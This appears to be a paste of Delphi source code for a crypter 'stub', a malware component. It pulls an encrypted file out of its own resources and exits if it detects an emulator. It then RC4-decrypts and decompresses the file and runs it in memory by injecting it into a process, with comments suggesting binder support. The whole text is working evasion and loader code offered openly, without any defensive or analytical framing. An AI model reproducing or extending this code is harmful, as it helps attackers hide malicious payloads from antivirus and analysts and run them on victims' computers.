Author: winner13. Date 2013-01-02 18:27:49, views: 1021, Raw
program Main; uses Windows, Util, Bytes, Unit2; { Start of stub } var Buffer : AnsiString; SettingsPointer : Pointer; SettingsLength : Integer; sInfo : TSettings; iBuffer : Integer; iFile : Pointer; begin //MessageBox(0, 'Begin', 'Info', MB_OK); LoadApp; // Load API's Dynamically. iBuffer := 0; MessageBox(0, 'Get Settings + Assign', 'Info', MB_OK); SettingsPointer := ResGet(SettingsLength, 'S'); Move(SettingsPointer^, sInfo, SettingsLength); // Get Settings + Assign. If sInfo.AntiE then begin If AntiEmulaters then Exit else end; // Check for Emulators - ChainCoder's code. //If sInfo.AntiV then begin If IsVMwarePresent then Exit else end; // Check for Vmware and Virtual PC. // Removed this as was crashing for some reason //MessageBox(0, 'Get File from Resources', 'Info', MB_OK); iFile := ResGet(iBuffer, 'F'); SetLength(Buffer, iBuffer); if iFile = nil then ExitProcess(0); // Get File from Resources, // if no file found Exit. // You could also add binder support by adding loops to loop through the files in resources Move(iFile^, Buffer[1], Length(Buffer)); //MessageBox(0, 'Decrypt File with RC4', 'Info', MB_OK); If sInfo.Encrypt then Buffer := RC4(Buffer, PChar(CharArrayToString(sInfo.Key))); // Decrypt file with RC4, if RC4 was selected. //MessageBox(0, 'DeCompress File', 'Info', MB_OK); If sInfo.Compress then Buffer := DeCompress(Buffer); // DeCompress Buffer, if compression was selected. GetMem(iFile, Length(Buffer)); Move(Buffer[1], iFile^, Length(Buffer)); //MessageBox(0, 'Execute file in Memory', 'Info', MB_OK); //Memory Execute(File, Process to Inject into, File Parameters, Visible) if not MemoryExecute(iFile, ParamStr(0), '', True) then Exit; // Injecting file into Memory, otherwise Exit. //MessageBox(0, 'File has been Executed.', 'Info', MB_OK); FreeMem(iFile); Exit; end. { End of Stub }